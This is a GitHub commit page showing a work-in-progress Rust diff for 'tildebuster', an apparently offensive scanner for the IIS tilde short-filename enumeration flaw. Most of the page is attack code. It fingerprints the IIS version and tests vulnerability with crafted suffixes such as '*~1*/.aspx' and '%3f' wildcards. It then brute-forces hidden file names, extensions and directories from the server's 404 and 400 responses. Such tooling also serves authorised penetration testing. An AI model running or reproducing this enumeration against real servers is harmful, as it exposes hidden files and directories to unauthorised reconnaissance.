Skip to content

Commit

Permalink
wip: first draft for tilde enum module
Browse files Browse the repository at this point in the history
  • Loading branch information
@phra
phra committed Jun 25, 2019
1 parent 3f89b2d commit 622a89f
Show file tree
Hide file tree
Showing 2 changed files with 87 additions and 62 deletions.
144 changes: 84 additions & 60 deletions src/tildebuster/mod.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -151,24 +151,25 @@ impl TildeBuster {
}
None => {
match msg.kind {
FSObject::NOT_EXISTING => {
trace!("{:?}", msg);
},
FSObject::FILE => {
if msg.request.extension.len() < 3 {

} else {
if no_progress_bar {
println!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
);
} else {
bar.println(format!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
));
}
}
if no_progress_bar {
println!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
);
} else {
bar.println(format!(
"File\t{}.{}",
msg.request.filename,
msg.request.extension,
));
}

result_processor.maybe_add_result(msg);
},
FSObject::DIRECTORY => {
if no_progress_bar {
Expand All @@ -182,23 +183,25 @@ impl TildeBuster {
msg.request.filename,
));
}

result_processor.maybe_add_result(msg);
},
FSObject::EXISTING_FILE => {
FSObject::BRUTE_EXTENSION => {
for c in chars1.iter() {
let mut request = msg.request.clone();
request.extension = format!("{}{}", msg.request.extension, c);
request.extension = format!("{}{}", request.extension, c);
rt::spawn(TildeBuster::_brute_extension(tx1.clone(), client1.clone(), request));
}
}
FSObject::EXISTING_DIRECTORY => {
},
FSObject::BRUTE_FILENAME => {
for c in chars1.iter() {
let mut request = msg.request.clone();
request.filename = format!("{}{}", msg.request.filename, c);
request.filename = format!("{}{}", request.filename, c);
rt::spawn(TildeBuster::_brute_filename(tx1.clone(), client1.clone(), request));
}
},
FSObject::NOT_EXISTING => {
trace!("{:?}", msg);
FSObject::CHECK_IF_DIRECTORY => {
rt::spawn(TildeBuster::_check_if_directory(tx1.clone(), client1.clone(), msg.request));
},
}
},
Expand All @@ -218,12 +221,11 @@ impl TildeBuster {
client: Client<HttpsConnector<HttpConnector>>,
request: TildeRequest,
) -> impl Future<Item = (), Error = ()> {
let mut request = request;
request.url = format!("{}~1.{}{}", request.url, request.extension, "%3f".repeat(3 - request.extension.len()));
let vuln_url = format!("{}~1.{}{}", request.url, request.extension, "%3f".repeat(3 - request.extension.len()));
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(&request.url.parse::<hyper::Uri>().unwrap())
.uri(&vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

Expand All @@ -241,7 +243,7 @@ impl TildeBuster {
},
(hyper::StatusCode::NOT_FOUND, _) => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_FILE,
kind: FSObject::BRUTE_EXTENSION,
error: None,
request: request,
};
Expand Down Expand Up @@ -274,12 +276,11 @@ impl TildeBuster {
request: TildeRequest,
) -> impl Future<Item = (), Error = ()> {
let magic_suffix = "*~1*/.aspx";
let mut request = request;
request.url = format!("{}{}", request.url, magic_suffix); // TODO: do not append every time
let vuln_url = format!("{}{}", request.url, magic_suffix);
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(&request.url.parse::<hyper::Uri>().unwrap())
.uri(&vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

Expand All @@ -288,32 +289,16 @@ impl TildeBuster {
.and_then(move |res| {
match (res.status(), request.url.len()) {
(hyper::StatusCode::NOT_FOUND, 6) => {
rt::spawn(TildeBuster::_check_if_directory(tx.clone(), client.clone(), request.clone())
.and_then(move |is_directory| {
match is_directory {
true => {
let res = SingleTildeScanResult {
kind: FSObject::DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
false => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_FILE,
error: None,
request: request,
};
tx.send(res).unwrap();
},
}
Ok(())
}));
let res = SingleTildeScanResult {
kind: FSObject::CHECK_IF_DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
(hyper::StatusCode::NOT_FOUND, _) => {
let res = SingleTildeScanResult {
kind: FSObject::EXISTING_DIRECTORY,
kind: FSObject::BRUTE_FILENAME,
error: None,
request: request,
};
Expand Down Expand Up @@ -344,20 +329,59 @@ impl TildeBuster {
tx: Sender<SingleTildeScanResult>,
client: Client<HttpsConnector<HttpConnector>>,
request: TildeRequest,
) -> impl Future<Item = bool, Error = ()> {
futures::future::ok(true) // TODO: implement check directory
) -> impl Future<Item = (), Error = ()> {
let magic_suffix = "~1/.aspx";
let vuln_url = format!("{}{}", request.url, magic_suffix);
let hyper_request = Request::builder()
.header("User-Agent", &request.user_agent[..])
.method(&request.http_method[..])
.uri(vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(request.http_body.clone()))
.expect("Request builder");

client
.request(hyper_request)
.and_then(move |res| {
match res.status() {
hyper::StatusCode::NOT_FOUND => {
let res = SingleTildeScanResult {
kind: FSObject::DIRECTORY,
error: None,
request: request,
};
tx.send(res).unwrap();
},
hyper::StatusCode::BAD_REQUEST => {
let res = SingleTildeScanResult {
kind: FSObject::BRUTE_EXTENSION,
error: None,
request: request,
};
tx.send(res).unwrap();
},
_ => {
warn!("Got invalid HTTP status code when checking if vulnerable: {}", res.status());
},
}

Ok(())
})
.or_else(|e| {
warn!("Got HTTP error when bruteforcing the filename: {}", e);
Ok(())
})
}

pub fn check_iis_version(&self, client: &Client<HttpsConnector<HttpConnector>>) -> impl Future<Item = IISVersion, Error = hyper::Error> {
let request = Request::builder()
let hyper_request = Request::builder()
.header("User-Agent", &self.user_agent[..])
.method(&self.http_method[..])
.uri(self.url.parse::<hyper::Uri>().unwrap())
.body(Body::from(self.http_body.clone()))
.expect("Request builder");

client
.request(request)
.request(hyper_request)
.and_then(move |res| {
let version = res.headers().get("Server").unwrap().to_str().unwrap();
Ok(TildeBuster::map_iis_version(version))
Expand All @@ -384,15 +408,15 @@ impl TildeBuster {
pub fn check_if_vulnerable(&self, client: &Client<HttpsConnector<HttpConnector>>, version: IISVersion) -> impl Future<Item = bool, Error = hyper::Error> {
let magic_suffix = "*~1*/.aspx";
let vuln_url = format!("{}{}", self.url, magic_suffix);
let request = Request::builder()
let hyper_request = Request::builder()
.header("User-Agent", &self.user_agent[..])
.method(&self.http_method[..])
.uri(vuln_url.parse::<hyper::Uri>().unwrap())
.body(Body::from(self.http_body.clone()))
.expect("Request builder");

client
.request(request)
.request(hyper_request)
.and_then(|res| {
match res.status() {
hyper::StatusCode::NOT_FOUND => Ok(true),
Expand Down
5 changes: 3 additions & 2 deletions src/tildebuster/result_processor.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,8 +5,9 @@ use std::{fs::File, io::Write, path::Path, str};
pub enum FSObject {
FILE,
DIRECTORY,
EXISTING_DIRECTORY,
EXISTING_FILE,
BRUTE_FILENAME,
BRUTE_EXTENSION,
CHECK_IF_DIRECTORY,
NOT_EXISTING,
}

Expand Down

0 comments on commit 622a89f

Please sign in to comment.